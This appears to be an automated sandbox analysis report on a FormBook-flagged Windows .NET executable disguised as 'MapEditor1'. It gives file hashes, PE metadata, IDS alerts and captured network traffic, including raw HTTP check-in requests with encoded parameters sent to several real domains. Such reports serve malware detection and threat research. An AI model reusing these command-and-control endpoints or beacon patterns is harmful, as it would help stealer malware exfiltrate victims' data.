                                                  SHA-256: 9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                                  SHA-512: A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                                  Malicious: true
                                                  Reputation: unknown
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows

                                                  Static File Info

                                                  General

                                                  File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit): 7.476049309864918
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name: divpCHa0h7.exe
                                                  File size: 477696
                                                  MD5: fda0d823b262ac2b1bd76a2053c29692
                                                  SHA1: 73f72d7c987d44d1f236c138c5617b527c5ba340
                                                  SHA256: 91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
                                                  SHA512: 230e3a12c58a61c2348463b5acb92a6b557419b79e0427882750caa84d3c7e8fcec92ff6151f4f22b6eb967da138c931ed56f0dedadf1af1ac5d809508e74507
                                                  SSDEEP: 12288:AsXSBAmUT9BbRsXFkN8xDqT2LWWJOxTa:AsCBAme9Bb2Xq8xk2LWx
                                                  File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash: c4b28ed696aa92c0

                                                  Static PE Info

                                                  General

                                                  Entrypoint: 0x45d612
                                                  Entrypoint Section: .text
                                                  Digitally signed: false
                                                  Imagebase: 0x400000
                                                  Subsystem: windows gui
                                                  Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp: 0x6166C8DB [Wed Oct 13 11:54:03 2021 UTC]
                                                  TLS Callbacks: (none)
                                                  CLR (.Net) Version: v4.0.30319
                                                  OS Version Major: 4
                                                  OS Version Minor: 0
                                                  File Version Major: 4
                                                  File Version Minor: 0
                                                  Subsystem Version Major: 4
                                                  Subsystem Version Minor: 0
                                                  Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5d5c0 | 0x4f | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5e000 | 0x18ca4 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x78000 | 0xc | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                  Sections

                                                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x2000 | 0x5b618 | 0x5b800 | False | 0.880715292008 | data | 7.77424395601 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc | 0x5e000 | 0x18ca4 | 0x18e00 | False | 0.195381202889 | data | 5.07070154334 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0x78000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  Name | RVA | Size | Type | Language | Country
                                                  RT_ICON | 0x5e180 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                  RT_ICON | 0x5e5f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | |
                                                  RT_ICON | 0x5f6b0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
                                                  RT_ICON | 0x61c68 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                  RT_ICON | 0x65ea0 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
                                                  RT_GROUP_ICON | 0x766d8 | 0x4c | data | |
                                                  RT_VERSION | 0x76734 | 0x370 | data | |
                                                  RT_MANIFEST | 0x76ab4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                  Imports

                                                  DLL | Import
                                                  mscoree.dll | _CorExeMain

                                                  Version Infos

                                                  Description | Data
                                                  Translation | 0x0000 0x04b0
                                                  LegalCopyright | Copyright Gottschalks 2011
                                                  Assembly Version | 1.0.0.0
                                                  InternalName | DateTimeFormatFla.exe
                                                  FileVersion | 1.0.0.0
                                                  CompanyName | Gottschalks
                                                  LegalTrademarks |
                                                  Comments |
                                                  ProductName | MapEditor1
                                                  ProductVersion | 1.0.0.0
                                                  FileDescription | MapEditor1
                                                  OriginalFilename | DateTimeFormatFla.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                  10/13/21-19:47:34.244388 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  10/13/21-19:47:40.620774 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.5 | 8.8.8.8
                                                  10/13/21-19:47:40.694370 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.5 | 104.165.34.6
                                                  10/13/21-19:47:40.694370 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.5 | 104.165.34.6
                                                  10/13/21-19:47:40.694370 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.5 | 104.165.34.6
                                                  10/13/21-19:48:01.554977 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49789 | 80 | 192.168.2.5 | 108.167.135.122
                                                  10/13/21-19:48:01.554977 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49789 | 80 | 192.168.2.5 | 108.167.135.122
                                                  10/13/21-19:48:01.554977 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49789 | 80 | 192.168.2.5 | 108.167.135.122
                                                  10/13/21-19:48:12.861304 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49812 | 80 | 192.168.2.5 | 8.212.24.67
                                                  10/13/21-19:48:12.861304 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49812 | 80 | 192.168.2.5 | 8.212.24.67
                                                  10/13/21-19:48:12.861304 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49812 | 80 | 192.168.2.5 | 8.212.24.67

                                                  Network Port Distribution

                                                  TCP Packets

                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Oct 13, 2021 19:47:34.178965092 CEST | 49767 | 80 | 192.168.2.5 | 23.227.38.74
                                                  Oct 13, 2021 19:47:34.196883917 CEST | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  Oct 13, 2021 19:47:34.197135925 CEST | 49767 | 80 | 192.168.2.5 | 23.227.38.74
                                                  Oct 13, 2021 19:47:34.197210073 CEST | 49767 | 80 | 192.168.2.5 | 23.227.38.74
                                                  Oct 13, 2021 19:47:34.213325977 CEST | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  Oct 13, 2021 19:47:34.244388103 CEST | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  Oct 13, 2021 19:47:34.244424105 CEST | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  Oct 13, 2021 19:47:34.244447947 CEST | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  Oct 13, 2021 19:47:34.244472980 CEST | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  Oct 13, 2021 19:47:34.244493961 CEST | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  Oct 13, 2021 19:47:34.244508982 CEST | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  Oct 13, 2021 19:47:34.244515896 CEST | 49767 | 80 | 192.168.2.5 | 23.227.38.74
                                                  Oct 13, 2021 19:47:34.244524002 CEST | 80 | 49767 | 23.227.38.74 | 192.168.2.5
                                                  Oct 13, 2021 19:47:34.244680882 CEST | 49767 | 80 | 192.168.2.5 | 23.227.38.74
                                                  Oct 13, 2021 19:47:34.244837999 CEST | 49767 | 80 | 192.168.2.5 | 23.227.38.74
                                                  Oct 13, 2021 19:47:40.524382114 CEST | 49768 | 80 | 192.168.2.5 | 104.165.34.6
                                                  Oct 13, 2021 19:47:40.694076061 CEST | 80 | 49768 | 104.165.34.6 | 192.168.2.5
                                                  Oct 13, 2021 19:47:40.694190025 CEST | 49768 | 80 | 192.168.2.5 | 104.165.34.6
                                                  Oct 13, 2021 19:47:40.694370031 CEST | 49768 | 80 | 192.168.2.5 | 104.165.34.6
                                                  Oct 13, 2021 19:47:40.867327929 CEST | 80 | 49768 | 104.165.34.6 | 192.168.2.5
                                                  Oct 13, 2021 19:47:40.867357969 CEST | 80 | 49768 | 104.165.34.6 | 192.168.2.5
                                                  Oct 13, 2021 19:47:40.867674112 CEST | 49768 | 80 | 192.168.2.5 | 104.165.34.6
                                                  Oct 13, 2021 19:47:40.867718935 CEST | 49768 | 80 | 192.168.2.5 | 104.165.34.6
                                                  Oct 13, 2021 19:47:41.038270950 CEST | 80 | 49768 | 104.165.34.6 | 192.168.2.5
                                                  Oct 13, 2021 19:47:45.901201963 CEST | 49769 | 80 | 192.168.2.5 | 81.169.145.161
                                                  Oct 13, 2021 19:47:45.919284105 CEST | 80 | 49769 | 81.169.145.161 | 192.168.2.5
                                                  Oct 13, 2021 19:47:45.919430017 CEST | 49769 | 80 | 192.168.2.5 | 81.169.145.161
                                                  Oct 13, 2021 19:47:45.919836998 CEST | 49769 | 80 | 192.168.2.5 | 81.169.145.161
                                                  Oct 13, 2021 19:47:45.938008070 CEST | 80 | 49769 | 81.169.145.161 | 192.168.2.5
                                                  Oct 13, 2021 19:47:45.938915014 CEST | 80 | 49769 | 81.169.145.161 | 192.168.2.5
                                                  Oct 13, 2021 19:47:45.938937902 CEST | 80 | 49769 | 81.169.145.161 | 192.168.2.5
                                                  Oct 13, 2021 19:47:45.939183950 CEST | 49769 | 80 | 192.168.2.5 | 81.169.145.161
                                                  Oct 13, 2021 19:47:45.939256907 CEST | 49769 | 80 | 192.168.2.5 | 81.169.145.161
                                                  Oct 13, 2021 19:47:45.959599018 CEST | 80 | 49769 | 81.169.145.161 | 192.168.2.5
                                                  Oct 13, 2021 19:47:51.185455084 CEST | 49773 | 80 | 192.168.2.5 | 64.190.62.111
                                                  Oct 13, 2021 19:47:51.203566074 CEST | 80 | 49773 | 64.190.62.111 | 192.168.2.5
                                                  Oct 13, 2021 19:47:51.203690052 CEST | 49773 | 80 | 192.168.2.5 | 64.190.62.111
                                                  Oct 13, 2021 19:47:51.203907013 CEST | 49773 | 80 | 192.168.2.5 | 64.190.62.111
                                                  Oct 13, 2021 19:47:51.221406937 CEST | 80 | 49773 | 64.190.62.111 | 192.168.2.5
                                                  Oct 13, 2021 19:47:51.249383926 CEST | 80 | 49773 | 64.190.62.111 | 192.168.2.5
                                                  Oct 13, 2021 19:47:51.249403954 CEST | 80 | 49773 | 64.190.62.111 | 192.168.2.5
                                                  Oct 13, 2021 19:47:51.249562025 CEST | 49773 | 80 | 192.168.2.5 | 64.190.62.111
                                                  Oct 13, 2021 19:47:51.249701023 CEST | 49773 | 80 | 192.168.2.5 | 64.190.62.111
                                                  Oct 13, 2021 19:47:51.267669916 CEST | 80 | 49773 | 64.190.62.111 | 192.168.2.5
                                                  Oct 13, 2021 19:48:01.420226097 CEST | 49789 | 80 | 192.168.2.5 | 108.167.135.122
                                                  Oct 13, 2021 19:48:01.553453922 CEST | 80 | 49789 | 108.167.135.122 | 192.168.2.5
                                                  Oct 13, 2021 19:48:01.553663969 CEST | 49789 | 80 | 192.168.2.5 | 108.167.135.122
                                                  Oct 13, 2021 19:48:01.554976940 CEST | 49789 | 80 | 192.168.2.5 | 108.167.135.122
                                                  Oct 13, 2021 19:48:01.689186096 CEST | 80 | 49789 | 108.167.135.122 | 192.168.2.5
                                                  Oct 13, 2021 19:48:01.689218998 CEST | 80 | 49789 | 108.167.135.122 | 192.168.2.5
                                                  Oct 13, 2021 19:48:01.689506054 CEST | 49789 | 80 | 192.168.2.5 | 108.167.135.122
                                                  Oct 13, 2021 19:48:01.689524889 CEST | 49789 | 80 | 192.168.2.5 | 108.167.135.122
                                                  Oct 13, 2021 19:48:01.822371960 CEST | 80 | 49789 | 108.167.135.122 | 192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2021 19:47:34.126564980 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2021 19:47:34.165796995 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Oct 13, 2021 19:47:39.315068960 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2021 19:47:40.339004993 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2021 19:47:40.522993088 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Oct 13, 2021 19:47:40.620671988 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Oct 13, 2021 19:47:45.876126051 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2021 19:47:45.900255919 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Oct 13, 2021 19:47:50.995863914 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2021 19:47:51.184072018 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Oct 13, 2021 19:48:01.289443970 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2021 19:48:01.419078112 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Oct 13, 2021 19:48:06.706549883 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2021 19:48:07.117193937 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Oct 13, 2021 19:48:12.124536991 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2021 19:48:12.523261070 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Oct 13, 2021 19:47:40.620774031 CEST | 192.168.2.5 | 8.8.8.8 | d007 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 13, 2021 19:47:34.126564980 CEST | 192.168.2.5 | 8.8.8.8 | 0xa732 | Standard query (0) | www.ribbonofficial.com | A (IP address) | IN (0x0001)
Oct 13, 2021 19:47:39.315068960 CEST | 192.168.2.5 | 8.8.8.8 | 0x470 | Standard query (0) | www.sanlifalan.com | A (IP address) | IN (0x0001)
Oct 13, 2021 19:47:40.339004993 CEST | 192.168.2.5 | 8.8.8.8 | 0x470 | Standard query (0) | www.sanlifalan.com | A (IP address) | IN (0x0001)
Oct 13, 2021 19:47:45.876126051 CEST | 192.168.2.5 | 8.8.8.8 | 0x72c7 | Standard query (0) | www.floaterslaser.com | A (IP address) | IN (0x0001)
Oct 13, 2021 19:47:50.995863914 CEST | 192.168.2.5 | 8.8.8.8 | 0xfc77 | Standard query (0) | www.mambacustomboats.com | A (IP address) | IN (0x0001)
Oct 13, 2021 19:48:01.289443970 CEST | 192.168.2.5 | 8.8.8.8 | 0x3eff | Standard query (0) | www.esyscoloradosprings.com | A (IP address) | IN (0x0001)
Oct 13, 2021 19:48:06.706549883 CEST | 192.168.2.5 | 8.8.8.8 | 0xa9c5 | Standard query (0) | www.begukiu0.info | A (IP address) | IN (0x0001)
Oct 13, 2021 19:48:12.124536991 CEST | 192.168.2.5 | 8.8.8.8 | 0x6a9b | Standard query (0) | www.kangrungao.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 13, 2021 19:47:34.165796995 CEST | 8.8.8.8 | 192.168.2.5 | 0xa732 | No error (0) | www.ribbonofficial.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 19:47:34.165796995 CEST | 8.8.8.8 | 192.168.2.5 | 0xa732 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
Oct 13, 2021 19:47:40.522993088 CEST | 8.8.8.8 | 192.168.2.5 | 0x470 | No error (0) | www.sanlifalan.com | | 104.165.34.6 | A (IP address) | IN (0x0001)
Oct 13, 2021 19:47:40.620671988 CEST | 8.8.8.8 | 192.168.2.5 | 0x470 | No error (0) | www.sanlifalan.com | | 104.165.34.6 | A (IP address) | IN (0x0001)
Oct 13, 2021 19:47:45.900255919 CEST | 8.8.8.8 | 192.168.2.5 | 0x72c7 | No error (0) | www.floaterslaser.com | floaterslaser.com | | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 19:47:45.900255919 CEST | 8.8.8.8 | 192.168.2.5 | 0x72c7 | No error (0) | floaterslaser.com | | 81.169.145.161 | A (IP address) | IN (0x0001)
Oct 13, 2021 19:47:51.184072018 CEST | 8.8.8.8 | 192.168.2.5 | 0xfc77 | No error (0) | www.mambacustomboats.com | | 64.190.62.111 | A (IP address) | IN (0x0001)
Oct 13, 2021 19:48:01.419078112 CEST | 8.8.8.8 | 192.168.2.5 | 0x3eff | No error (0) | www.esyscoloradosprings.com | websites076.homestead.com | | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 19:48:01.419078112 CEST | 8.8.8.8 | 192.168.2.5 | 0x3eff | No error (0) | websites076.homestead.com | | 108.167.135.122 | A (IP address) | IN (0x0001)
Oct 13, 2021 19:48:07.117193937 CEST | 8.8.8.8 | 192.168.2.5 | 0xa9c5 | Name error (3) | www.begukiu0.info | none | none | A (IP address) | IN (0x0001)
Oct 13, 2021 19:48:12.523261070 CEST | 8.8.8.8 | 192.168.2.5 | 0x6a9b | No error (0) | www.kangrungao.com | a.mb.cn | | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 19:48:12.523261070 CEST | 8.8.8.8 | 192.168.2.5 | 0x6a9b | No error (0) | a.mb.cn | | 8.212.24.67 | A (IP address) | IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.ribbonofficial.com
                                                  • www.sanlifalan.com
                                                  • www.floaterslaser.com
                                                  • www.mambacustomboats.com
                                                  • www.esyscoloradosprings.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49767 | 23.227.38.74 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 13, 2021 19:47:34.197210073 CEST | 5785 | OUT | GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1
Host: www.ribbonofficial.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 13, 2021 19:47:34.244388103 CEST | 5786 | IN | HTTP/1.1 403 Forbidden
Date: Wed, 13 Oct 2021 17:47:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Sorting-Hat-PodId: 216
X-Sorting-Hat-ShopId: 59389116584
X-Dc: gcp-europe-west1
X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 1; mode=block
X-Download-Options: noopen
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 69da64d2c8f74303-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Data Raw: (hex dump omitted)
Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col
Oct 13, 2021 19:47:34.244424105 CEST | 5788 | IN | Data Raw: (hex dump omitted)
Data Ascii: umn}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transiti
Oct 13, 2021 19:47:34.244447947 CEST | 5789 | IN | Data Raw: (hex dump omitted)
Data Ascii: }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
Oct 13, 2021 19:47:34.244472980 CEST | 5791 | IN | Data Raw: (hex dump omitted)
Data Ascii: ", "content-title": " " }, "ja": { "title": "
Oct 13, 2021 19:47:34.244493961 CEST | 5791 | IN | Data Raw: (hex dump omitted)
Data Ascii: // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage docum
Oct 13, 2021 19:47:34.244508982 CEST | 5791 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49768 | 104.165.34.6 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 13, 2021 19:47:40.694370031 CEST | 5793 | OUT | GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
Host: www.sanlifalan.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 13, 2021 19:47:40.867327929 CEST | 5793 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 13 Oct 2021 17:47:40 GMT
Content-Type: text/html
Content-Length: 781
Connection: close
Data Raw: (hex dump omitted)
Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49769 | 81.169.145.161 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 13, 2021 19:47:45.919836998 CEST | 5794 | OUT | GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1
Host: www.floaterslaser.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 13, 2021 19:47:45.938915014 CEST | 5795 | IN | HTTP/1.1 404 Not Found
Date: Wed, 13 Oct 2021 17:47:45 GMT
Server: Apache/2.4.51 (Unix)
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: (hex dump omitted)
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49773 | 64.190.62.111 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 13, 2021 19:47:51.203907013 CEST | 5807 | OUT | GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
Host: www.mambacustomboats.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 13, 2021 19:47:51.249383926 CEST | 5809 | IN | HTTP/1.1 302 Found
date: Wed, 13 Oct 2021 17:47:51 GMT
content-type: text/html; charset=UTF-8
content-length: 0
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0iebMnn85rGPdDqIEJxeNy8gIbO6CRs7ZDHqhQVvU/PQfR/eAFVjJYiSzo9U0xPuetoM72JXq2vZLu3MQDBEFQ==
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
last-modified: Wed, 13 Oct 2021 17:47:51 GMT
location: https://sedo.com/search/details/?partnerid=324561&language=e&domain=mambacustomboats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
x-cache-miss-from: parking-f666569bc-lfcv4
server: NginX
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49789 | 108.167.135.122 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 13, 2021 19:48:01.554976940 CEST | 5851 | OUT | GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
Host: www.esyscoloradosprings.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 13, 2021 19:48:01.689186096 CEST | 5852 | IN | HTTP/1.1 503 Service Unavailable
Content-Type: text/html; charset=UTF-8
Content-Length: 884
Connection: close
P3P: CP="CAO PSA OUR"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Data Raw: (hex dump omitted)
